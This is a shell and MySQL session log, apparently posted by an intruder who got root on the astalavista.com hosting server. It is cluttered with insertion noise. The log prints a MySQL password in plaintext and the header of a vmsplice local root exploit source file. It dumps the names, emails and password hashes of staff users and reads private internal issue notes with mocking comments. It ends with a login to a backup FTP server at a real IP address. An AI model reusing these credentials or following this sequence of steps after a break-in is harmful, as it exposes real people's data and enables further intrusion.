* k1 W$ H/ g% j& I) g0 ?7 Z$conxUser = ‘hostinguser’; // MySQL user( i" s$ Y9 m" h ^
$conxPassword = ‘cXvB3981′; // MySQL password+ e* k) A" f: x$ i+ d8 o% |
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
1 G) U- n I3 w?>. `. ]) R5 ^. O) E4 j3 c
7 O* e! l! Z% ~% F0 w
sh-3.2# cd ..
/ X; j1 I( p* l/ q0 y$ l+ csh-3.2# cd com& U: b' B3 _: L' Z; d; @2 H4 s n, i
sh-3.2# ls -la
, T4 x6 g$ N& E+ Ltotal 141208- I% K- w7 }& W6 Y# f
drwx–x–x 10 com com 4096 Apr 28 12:40 .. I* ], [: S9 @" y, [+ A
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
# r2 Z5 w" L @5 T0 u9 j1 Mdrwx—— 2 com com 4096 Jun 4 04:04 backups
* ?, f0 S5 F. z, d5 O-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
" {5 R4 b: g( k+ g' M* Ldrwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
, M4 j! F2 c! A+ |9 A. h-rw——- 1 com com 21880 Jun 2 08:07 .bash_history* }0 J) ?& I8 W
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout( z( A$ c p( |4 A: [/ R/ M
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
* b1 X D- e" i( u-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc& s$ k, u0 G2 }2 a& V1 z/ N
drwx–x–x 3 com com 4096 Jan 29 2008 domains
% X1 K+ i, r$ t# m-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed* D) O" P4 n. s$ z( L, l, c+ a
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap
% D: x, u+ ~+ L-rw——- 1 com com 69 Nov 18 2008 .lesshst
( `/ r7 ^# @! V ddrwx—— 2 com com 4096 Sep 24 2007 mail" o6 E. l6 |9 c. [# ^4 l+ j. d4 T
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history3 G u' ]5 X. h
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp' H; K! h7 R$ R% P3 r
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html* L+ o$ x, } W; i
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow* P1 ]: |* V' V8 [- d
drwx—— 2 com com 4096 Aug 26 2008 .ssh
r1 b% {, Z$ j# t7 ]$ r-rwx—— 1 com com 8515 Feb 10 2008 t
& `. a1 x R" o7 A-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c; k7 h/ z# A! U4 I& b, e) e0 M1 ?
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
_/ v/ c) n9 e1 }/ \, ]- U-rw-rw-r– 1 com com 617 May 20 2008 .toprc
% l8 T! G/ F5 A! B& W; s, K# z, ^-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql6 p6 Y$ n5 F- P# Y
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo9 {3 U3 R+ B+ D- F
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc/ m8 ^; X* g' Q/ g
# G" A: G# g, {, V/ J$ u9 \% Ksh-3.2# head t.c* a: R( m. `* Y0 D. ]! O) X3 V
/*4 H# v. U- Q7 l5 M! [/ O
* jessica_biel_naked_in_my_bed.c
) I$ k, r, ?/ P8 D4 X9 \*3 Y6 A. m$ e% ^8 V6 _; R$ Y, d
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
* Y6 g# F) p. q. ] q8 c7 A* }* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
7 g/ o1 w8 b+ j* ~- @2 w0 p* Stejnak je to stare jak cyp a aj jakesyk rozbite.1 v% `* X" @0 B8 K) u
*! S9 z* p! @$ M
* Linux vmsplice Local Root Exploit; q. p% C' k9 P( c7 Z2 e! Y
* By qaaz: u7 C! s( M$ X) Y/ Z
*
! {# _. S1 h/ c8 A
' Q d( Q4 n, s- @- x; Jsh-3.2# cd /
% @! _. t! x7 Z' q+ Wsh-3.2# ls -la
, Q# Q8 i0 G0 |7 q* Atotal 360
# H. p; C8 e' C4 G( J2 _drwxr-xr-x 25 root root 4096 Jun 3 02:43 .$ l: l1 z1 w3 i) \% ?' B
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
. L. V+ O$ h2 X-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
6 w" T% d9 \' |2 \" D, j" R- [; U- h-rw——- 1 root root 10240 Jun 3 02:39 aquota.user0 s1 I8 b) [. o8 t) G9 }3 X: q- Y
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db# m/ q: z3 ~# J7 \* T8 o' K
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck( a* y. Q6 e b" u" o, u) _
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
9 g7 O5 p" i3 [0 h, Z, Pdrwxr-xr-x 3 root root 4096 Dec 29 2007 backup2 P" X! A. V, d b
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
7 B2 J9 n \9 y- ^& rdrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
8 X: c9 Y: Q3 {& M/ P3 `8 P. Ddrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
3 l2 ]- J- w! P) I/ ~drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
! v& Q% S( a, y3 {$ ?9 vdrwxr-xr-x 14 root root 4096 Mar 11 17:56 home4 P- N! }% J: G0 y1 |/ f
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf/ ~! @) C( C+ J! l, @: ^- h$ Z
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib: i4 K! a9 j& l* I2 _. N
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib649 E- I; b; P ^1 x" }) ?" e7 Z6 s2 H
drwx—— 2 root root 16384 Sep 11 2007 lost+found$ t6 K4 k1 q- V1 s6 Y
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media8 X2 g: L: {: B! u6 x4 c: Q, F
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc
9 F( N6 A: x* j1 \8 {( U, gdrwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
( j1 j$ H" L# I, |, {; \-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg5 H" `1 K. I# c8 `2 j8 @8 y
drwxr-xr-x 2 root root 0 Jun 3 02:43 net5 B, N, j( U. E u
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
0 d8 ]0 h, J D' e% Kdr-xr-xr-x 264 root root 0 Jun 3 02:42 proc$ q9 Y; B6 N3 t
drwxr-x— 15 root root 4096 Jun 4 08:40 root
D8 e) m% P/ X! p' `9 H9 kdrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
0 Z' b, J! r$ ?1 Sdrwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux
, g2 t0 Y: z, D7 wdrwxr-xr-x 2 root root 4096 Mar 11 17:56 srv0 X4 Y/ S O2 T2 P
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys
' s3 L- ?. q; U; idrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
" B1 }7 b5 V8 o9 l* xdrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
0 l# `) y6 W" P+ gdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var
! m; [2 N' l, p" g2 x" ~. ~
$ c2 t3 o) Y& y! Zsh-3.2# cd opt- ^8 \9 D; Q8 |/ V, C6 R0 J# i% [- L
sh-3.2# ls -la! ]2 |' W4 n8 B3 ^' u
total 20( L; X% _" w* @
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .+ b: u0 n/ @5 Q- p& _! |
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .. s8 [+ x1 z8 h
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
q8 c) ]4 x; g% H( m J( j# i( g ?0 \0 |# o: ~# r- P
sh-3.2# cd lsws/) L3 C3 T( f8 k: s7 |
sh-3.2# ls -la
, L2 @# t1 e3 l9 B7 h% H# v7 Jtotal 108; Z v! d7 {1 ~2 n4 ~' O7 e% i
drwxr-xr-x 15 root root 4096 Mar 20 2008 .
4 s# y1 B% |/ l+ c' d5 gdrwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
/ Y; i) s; F$ _) U( |8 ]" [drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons3 H2 C6 k" R7 p5 k; G
drwxr-xr-x 13 root root 4096 May 29 15:10 admin
% `, C4 ?. u l ddrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
; k% P- K& i8 b- \0 Fdrwxr-xr-x 2 root root 4096 May 29 15:10 bin7 i5 ~! D* U! w7 U g9 U3 ?4 n+ K
drwx—— 4 apache apache 4096 Jun 3 02:43 conf9 _& ?( P+ }5 d9 `& ~' Y
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
! F1 c/ r: P: d. W) Xdrwxr-xr-x 2 root root 4096 Sep 15 2008 docs
" e$ h* Q& Q% A, qdrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
: L; M- f& ^! q3 v. }1 D1 cdrwxr-xr-x 2 root root 4096 Sep 15 2008 lib/ q5 f5 i) L* X; n8 ~
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
8 D% ^* P5 s9 |& t-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP* c$ i- f$ x# t3 g' a: x
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
9 M" o3 _. D$ w# n& f-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP, N1 z' D1 d; J/ b: O
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
( K* n! R; _+ h$ Y1 pdrwxr-xr-x 2 root root 4096 Mar 20 2008 php
" Z% P _ [* xdrwx—— 2 apache apache 4096 Mar 20 2008 phpbuild6 Y T" w! e, u# ^ {
drwxr-xr-x 3 root root 4096 Mar 20 2008 share3 q: \6 Y2 b: ~5 Y; f( o( p
-rw-r–r– 1 root root 6 May 29 15:10 VERSION
" q- m' N9 A k0 E3 ~
2 ~( Z2 s# M: @, n! |9 dsh-3.2# cd conf w( G& [7 x) C5 V0 e' K" p
sh-3.2# ls -la* S6 J) E9 u2 a! O3 Y F0 O+ N! s
total 48# S2 t" ?' x, g0 r7 D5 E/ a
drwx—— 4 apache apache 4096 Jun 3 02:43 .
- C2 E0 d* n( `6 p, j7 Xdrwxr-xr-x 15 root root 4096 Mar 20 2008 .. z$ {5 H4 L) v4 P& l& c; C: M0 S: g. L6 U
drwx—— 2 apache apache 4096 Mar 20 2008 cert: h0 K, \5 c$ n: R, e4 Y
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml- J6 u8 b& i/ k) V
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak0 G9 g, ^6 \6 o
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last
( T. e v3 l1 _5 \-rw——- 1 apache apache 256 May 29 15:10 license.key
% R' A9 i5 R% g+ p" j0 z-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
+ g2 }4 q6 c! u% F" x$ |3 r+ t-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties m; R! X% o, H! D. z) D
-rw——- 1 apache apache 20 May 29 15:10 serial.no+ r; @& j m: w' B- \
drwx—— 2 apache apache 4096 Mar 20 2008 templates
5 b7 B; W j: V" w' {
. z, k2 l: Y, ?sh-3.2# cat serial.no
) C% f. T' W$ I6 B9 lIbDl-oVsO-CKqL-wVRa
. D2 W" m5 M1 Q1 J( m6 A- Y, n0 L/ \. m
sh-3.2# mysql) C" e s, W+ b' ]4 ^5 D- o
Welcome to the MySQL monitor. Commands end with ; or \g.
4 E {: g7 }7 u! MYour MySQL connection id is 286844
; }9 A" u! m# r( F9 Y4 A: iServer version: 5.0.45-community-log MySQL Community Edition (GPL)
, L/ K6 \: d2 m2 j( {6 G& E2 J% @8 M3 w+ F
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
. a6 s' d" d$ a- ?1 s/ Z4 R, {* I: D; Y+ \, c
mysql> show databases;: y/ S: @6 Z7 L0 O: k2 c
+———————–+
, f; F6 ?' ~5 J' r: r| Database |
6 k! F* y- k# e2 L+———————–+
4 C3 C0 T2 W3 u| information_schema |
/ t8 ]) P; }3 v# P. l- P| astanet_ads |
& [# z* x A3 W| astanet_mailing_lists |/ u3 Z; I# _- a' W4 _- n. ^
| astanet_mediawiki |
! i9 m: W/ e* ?% Q1 s" ?| astanet_membersystem |: z1 ^) b' U) Z7 X, d7 E
| com_contrexx |( @: V& ]$ B: t' g8 c8 h3 d( t j4 N
| com_contrexx2 |9 J f' O. A$ C* a* z9 u; Y [( x
| com_contrexx2_live |
" t8 ?5 g' W& ` || da_roundcube |
- n& a4 ?5 G7 y2 F. H| dolphin |0 T9 q; V5 o4 D3 m$ ~
| ideapool |
6 j8 p6 {0 ?) j5 L| mysql |
/ c& Y3 x4 n: f5 Z2 b0 A& Q% I3 N1 g| test |
$ Q( i5 A; @5 }7 n- b" _8 U| yourmaster |
! ~: d' @1 x+ ~( z9 E( g+———————–+
8 L2 L# A5 X' d# \5 h, w8 l14 rows in set (0.00 sec)
1 i% E$ }! J$ C$ v. x; A; Q% D+ L H! I5 l' l- O
mysql> use ideapool
' o) o3 R) B( [4 w% D7 J& j( aDatabase changed2 s& _' g6 g: J ?; Q
mysql> show tables;; q2 @% w% G- E% G
+———————————–+/ ^) t$ v1 w3 {9 T3 O; y
| Tables_in_ideapool |
" Q6 y! c+ H: n; {' i; E: x, m+———————————–+
7 L. L$ ~6 Z9 t# M9 W% z# B. z| eventum_columns_to_display |
" v6 C0 ^8 B% y8 \, |$ }# K7 w( L. y4 y| eventum_custom_field |
e2 W) ]0 G3 A& z| eventum_custom_field_option |
$ G) j6 _& `% M( t2 Q W' U| eventum_custom_filter |& G9 \. J1 O. I; P) ^3 u, T2 F7 G
| eventum_customer_account_manager |3 w! `" i7 k& A
| eventum_customer_note |% Y7 E* u+ S7 J f, H" _2 w4 Q
| eventum_email_account |
# E' j# U C' z# J$ l| eventum_email_draft |; L0 S; g- q2 b, ~
| eventum_email_draft_recipient |
K. i8 i- n7 }* D5 x| eventum_email_response |& c! T6 S. S1 Z! e
| eventum_faq |
2 c8 Z& _+ O1 {' {2 L6 N| eventum_faq_support_level |
/ ~' ~9 L5 J5 Q! X; I# G| eventum_group |3 L; n: r: F3 j3 B) S2 r
| eventum_history_type |
$ B) R+ h) z5 k| eventum_irc_notice |
+ \( _- W6 X T' L/ L2 g L& u; Y5 o| eventum_issue |
# Z0 `& D( f( y% A8 h7 X| eventum_issue_association |
3 B+ s, {8 ?4 w| eventum_issue_attachment |
& G$ q( g6 Q0 ~; ~3 s| eventum_issue_attachment_file |
) T0 T( l+ m& C. h$ _| eventum_issue_checkin |% r* ~# g! A" i I8 M+ D- `2 r
| eventum_issue_custom_field |* R2 k( X, x; K, s4 S7 S
| eventum_issue_history |
$ @4 ?6 _( L. {: q! w| eventum_issue_quarantine |
- H- `. D8 W4 H3 I. Y b7 \5 R& y| eventum_issue_requirement |2 D" G" E( F0 q3 Q7 e" Q# A
| eventum_issue_user |. u+ A3 s `* N% h) P3 Z# [
| eventum_issue_user_replier |( w+ X/ C' z# ]. X
| eventum_link_filter |
$ G/ A2 k" E" e) k| eventum_mail_queue |
1 j. {0 ~ g5 K| eventum_mail_queue_log |5 d$ v( l5 I1 u( |2 _* `3 `
| eventum_news |5 X9 c) x( P5 G. T* [0 H1 t/ ?
| eventum_note |
# M3 t6 H; a0 i& [| eventum_phone_support |
6 `: S" `+ y6 P( {0 X| eventum_project |
3 H# K, f" V# @( d% n9 l7 Z| eventum_project_category |
- r# t9 _- q+ Z0 ^) z7 }| eventum_project_custom_field |
2 @' m8 M6 p# V- O1 N2 |$ g+ l| eventum_project_email_response |( a, n; }9 x2 R, v4 p2 c$ u [
| eventum_project_field_display |! M& k; F% i* V( a! K
| eventum_project_group |, ~: H1 W5 I$ X( \5 E$ e
| eventum_project_link_filter |
4 q; F/ [3 V2 l( q| eventum_project_news |" S5 Z8 p( U7 w/ I, X3 I( q
| eventum_project_phone_category |
; p2 l" h3 a5 Z5 Q5 Q9 E- e| eventum_project_priority |! X, F/ \+ m$ q B% X
| eventum_project_release |
7 L: J# t. o9 v1 y9 b! N| eventum_project_round_robin |$ w9 d @% O& S: f/ u
| eventum_project_status | r/ b: P3 p; p9 ~3 v* ]
| eventum_project_status_date |) j. f% P1 ^8 x& f
| eventum_project_user |
' {! I# P2 m5 x; G| eventum_reminder_action |0 m; ^5 K! w+ S+ }& u2 t
| eventum_reminder_action_list |) S% {3 q3 P* V
| eventum_reminder_action_type |: b, ?6 B! H4 _6 p; ]% [9 m
| eventum_reminder_field |* N. W* d2 P- h$ N
| eventum_reminder_history |& A# o+ ]" o% u H% n, l+ k# p
| eventum_reminder_level |$ X( o" V- B9 ]4 U" e
| eventum_reminder_level_condition |0 o1 h$ _ L1 t. |; T
| eventum_reminder_operator |4 {5 \5 n* S+ |2 y- Q6 w& m
| eventum_reminder_priority | o) s* `* \) H) N
| eventum_reminder_requirement |/ ^8 S1 o4 F8 y
| eventum_reminder_triggered_action |
" E( s; z- w. d% M| eventum_resolution |
! }% Q+ e! K: @+ P* e& J| eventum_round_robin_user |2 {, ~, z4 q7 B* A2 w
| eventum_search_profile |2 W& l Q9 B( F6 Z
| eventum_status |
' a( V6 a' j. V$ e0 d| eventum_subscription |: v- E/ O) F; _ d
| eventum_subscription_type |8 X# R& {1 E4 s
| eventum_support_email |
' p, C0 l0 d$ H5 t6 @7 m! I" s| eventum_support_email_body |
- a; H' A5 z' _- e/ J| eventum_time_tracking |4 q% [8 I, ~2 d5 u- C7 w
| eventum_time_tracking_category |1 s9 g: y2 W0 s4 i
| eventum_user |5 B, Y) l" P; J$ g
+———————————–+
0 C; `2 T$ H) {" Y- v( f( X69 rows in set (0.00 sec)9 }* r' D+ u3 P% D/ \. g5 D \/ j
& [8 M6 p; u. h" R3 G. Dmysql> describe eventum_user;
+ T t: h- E2 r0 a+————————-+——————+——+—–+———————+—————-+
& z! Z. N7 a ]8 c7 S| Field | Type | Null | Key | Default | Extra |
7 n1 q3 {+ |% t* v* l+————————-+——————+——+—–+———————+—————-+
+ _' T+ @. d; K4 Y% U+ R| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
, j4 @8 s8 c# Y& y, q| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
7 ?4 r% y. `& p! U) |9 h# ^| usr_customer_id | int(11) unsigned | YES | | NULL | |, a1 O0 F9 Y, K) {* O1 U
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |+ j) P9 |2 Y% ?3 Z) _" h! o* f0 F# x
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
, ^$ S3 c v( m: x, S1 g- e. C4 g| usr_status | varchar(8) | NO | | active | |3 D; R" L. Q, m2 D; |8 @5 G
| usr_password | varchar(32) | NO | | | |$ G% s G6 S. V/ s" P! N2 B6 h- T
| usr_full_name | varchar(255) | NO | | | |
' N& a) T) u( g! ~) z' |: U! A" p) c| usr_email | varchar(255) | NO | UNI | | |7 e7 ?) _2 O% m3 M
| usr_preferences | longtext | YES | | NULL | |. m5 f; g* S) v2 o
| usr_sms_email | varchar(255) | YES | | NULL | |
+ m3 h" d( O) k| usr_clocked_in | tinyint(1) | YES | | 0 | |
$ e3 D/ S3 |: S: a| usr_lang | varchar(5) | YES | | NULL | |
( n2 R. a7 l6 ` x( L3 {* p, T+————————-+——————+——+—–+———————+—————-+
* b5 Y2 c& K( Z O( ]3 e' ^13 rows in set (0.00 sec)
3 q+ q8 I5 |4 y6 I( o
& d' m2 j6 k6 u" g2 U, s, zmysql> select usr_full_name,usr_email,usr_password from eventum_user;
" v0 H+ b# Y! u/ K; i+———————-+——————————-+———————————-+
% o+ G; Q2 G) L1 v| usr_full_name | usr_email | usr_password |
# a- z* \. k; y* m' ^, E1 Q5 X+———————-+——————————-+———————————-+; H( Y- Y& ^ V' a. L9 Z
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |' ~! x# c" x9 u
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |' F# S1 ^. D% D# `0 @) S& z
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
B5 J0 n& ~( {8 r5 j. R| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |3 W7 ]+ ?' e- f: _( S( f1 h
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |% q7 G) r! ]4 E( Y5 z- i8 ]
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
, g, A3 F) f9 m| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |# p. z7 E& M: w
| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
2 j8 H" t& j$ m| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |# {* `5 ]. r8 E8 _5 u! Q O5 f
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |' [5 W. v2 u2 U3 ~
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |6 G B9 Z8 j6 `3 x
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |
- V- E; O9 l( j* `3 y1 L| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
7 S9 V; N* u& c| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |
+ _, X' t6 T; A# R| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
$ `+ Q' l6 H" D* C6 F6 ^, _2 {+———————-+——————————-+———————————-+- O5 N8 r! D2 k+ ^3 e5 M6 C
15 rows in set (0.00 sec)! x& P5 e/ @; l
' n+ K2 n+ U- o$ b. }mysql> select iss_description from eventum_issue where iss_id = 43;4 G4 `) b6 F, p0 a @. F% e6 u
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+' Y. O5 b3 a# S6 u, c
| iss_description ( B% |) Q# z! E& \. J
|" I- M0 I, U) ~5 v% Y
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
. C9 o6 \ R; Y| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be+ \7 L; w" t6 ]6 h1 k* V: h/ x
connected for 90 mins… 120mins… so what i propose is something like:3 w0 j/ h5 g4 O
链接标记[url]http://www.surfthechannel.com/[/url]' G+ V1 [, b, P
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system- P7 u$ R# p0 W7 H, R& W6 M
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t7 |; H8 ?; l0 [+ [$ I
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off; w4 _: M- [: e5 O
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
H) h( C- j! _6 }5 `2 o
, |( E( `! {9 R( f6 N1 ?: {We could also put advertisement during play on the flash video player itself… extra $$…
: r A5 i( e3 F, F1 _
! a$ [6 A9 ?2 d( jBy sykadul |
& @ q, n, B, w+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
8 G# ^( W( o. u, d+ h% Q. Z1 row in set (0.00 sec)! d& T. S! }' ~* Z
/ Z8 a% K" _' [6 ~
// Money and extra $$ is all they care about. remember that.
! R: {4 V3 O- H7 @! k, j
- K& W) c* a! F* [. v Fmysql> select iss_summary,iss_description from eventum_issue where iss_id =42;6 U! G4 L" ~# Q2 Q3 c' E8 d$ r
+————————+——————————————————————————————————————————————————————————————————————————————-+
# z9 J |5 f' L8 z4 H| iss_summary | iss_description
: y u! w' x' ^' l1 M1 E|
; V. S. N& L; `2 m! D- ?+ w+————————+——————————————————————————————————————————————————————————————————————————————-+8 K( ]/ L" X, O+ X! w1 {: r
| Forum for REAL EXPERTS | Hello,
t7 _; R4 I, i& L. [+ b
1 Z& F8 F$ L! x6 Z4 z2 v9 \+ FIshtus and I,
/ t- U7 c! O& Y$ _: l: H/ T. n$ F) u$ R2 U) s
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
8 P3 N. Y* C; L/ v1 i6 ^ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
1 w" W2 L# d9 M, o# T, N$ f2 f
: I6 p0 R/ ~8 K1 X+ e/ f" l$ xOne example a friend of mine from coresecurity.com!% O2 @, _0 r1 N! S
8 c& N" R$ P) J" |
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..: G6 T5 T/ U) G' y
4 [5 N5 P0 A$ W
|, `8 e) u, Q! f; g! G; i- l7 W; v
+————————+——————————————————————————————————————————————————————————————————————————————+
) \4 X+ b6 r; z( t8 M) M1 row in set (0.00 sec)$ @: [5 h. v0 x5 C8 V
+ J. M5 j" l& M+ R6 K
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
: {' K* X% a9 f9 u U+ e5 H+ ?
. P& T) K5 h0 a9 O( Cmysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
s7 V9 j$ Y, j" _( c" M: U! T+ `9 v8 X+——————+———————————————————————————————+' g$ k2 i. S; e' f: F2 U. b+ V
| iss_summary | iss_description |
1 b5 Z2 x5 H+ M d- y* R2 X) b) h. b% {+——————+———————————————————————————————+* W/ k+ }2 P" M! R1 _
| Website guidance | Virtual Girl which guides you trought the website.8 w @9 ?% N$ I9 x, R( J: U& D n
3 {3 U0 `# S6 f/ A, P4 Q+ n+ XWe need a girl with who you can ( talk )!!!* ~4 p9 G. L; j
Also for the News!
" L' \9 M7 w. x: y* YSo my suggestion is a girl who read you the news loud if you like!
! x% q. F9 G- G! f. z G3 Tyou can choose between read yourselfe or she read it for you or both!
( l$ g1 t* b1 z# c9 w
5 u; C: H. \6 I9 M9 D3 q+ i, k- |0 [, vGo to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
& c) P* q. [, J1 p* G8 i! a7 J
9 b8 q& e( X% |! gHave a look on the example girls!!0 A6 E3 \# w+ u/ g# _
$ a' u R/ @( m6 a& J9 q链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]+ i3 Z- ?7 S+ N
2 n" x, K/ {& a! v
or that A, A& N e" D1 ~$ b& f7 X
7 Q3 f5 b5 @: s6 x链接标记[url]http://www.yellostrom.de/[/url]
; x' R: R0 y, w: \ S' X' K( @2 Z7 k) p. M' |( K
|
3 C/ k0 ]0 _3 f* A2 M/ E+——————+———————————————————————————————+9 ?3 F4 F0 A* n/ }; ]1 q
1 row in set (0.00 sec)
. I% g. ?: U8 R4 B: \" P' _
. ]1 o4 L8 H9 c' z2 S- n; A; g// ha ha.: G" Q) `4 }9 m" v- y! N( X
V# D# b$ a) Z3 H5 mmysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;6 Z# W* s: l/ v0 L- \4 Q
+————————–+———————————————————————————————————–+1 M/ r: v3 _# e9 O* N o2 ]
| iss_summary | iss_description |
/ J% T4 j/ }+ @, A* a8 N+————————–+———————————————————————————————————–+
( q' E3 _7 D% \! P& o+ v| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
1 Q( o/ `9 h: a6 x u+————————–+———————————————————————————————————–+
" g5 Y+ I0 W3 F! I0 u1 row in set (0.00 sec)8 b* C) @# W3 Y, K& {
4 i. I+ j% t6 R; U \* f2 ?. I// LOL./ v. t/ F" n- O* _, }, }% n
! ^- O4 W; |) D; M$ J& G' kmysql> exit
/ C! H5 a- y1 y, I# D* Y( |% cBye; Y% C5 p6 N1 y9 M, t. f; S( J
0 p% Y# D" ?% L
sh-3.2# ftp 212.254.194.163
) ?! E% t5 w# M0 K- F* A8 P( hConnected to 212.254.194.163.* h7 \7 \2 `5 o8 z O
220 BackupCOM_VW FTP server ready.( g" X: D: m' m |6 m( v$ _
504 AUTH: security mechanism ‘GSSAPI’ not supported.
j2 B2 [- N; ^504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.( H! k" I5 Y. m$ T5 [) T6 U
KERBEROS_V4 rejected as an authentication type
% _. e/ Z' Z* _ A/ `* v8 }* MName (212.254.194.163:root): astalavista.com
1 ~. R$ P" w& v331 Password required for astalavista.com.
; Y9 J4 ^! G9 |7 RPassword:
& j6 l1 T' o' a& Y" v, y230 User astalavista.com logged in.* M" n# B1 d0 V/ o; k' `
Remote system type is UNIX.( ]. C8 N( I; i2 z" q
Using binary mode to transfer files.
( E+ e; |/ G: R6 u- Rftp> ls -la* Z8 Y* {* |& H- s- Z% s
227 Entering Passive Mode (212,254,194,163,2,188)& _7 D8 j$ P" r' [6 i: d" Z$ ?
150 Opening BINARY mode data connection for ‘file list’.( Y& f+ h& k( u" T1 x
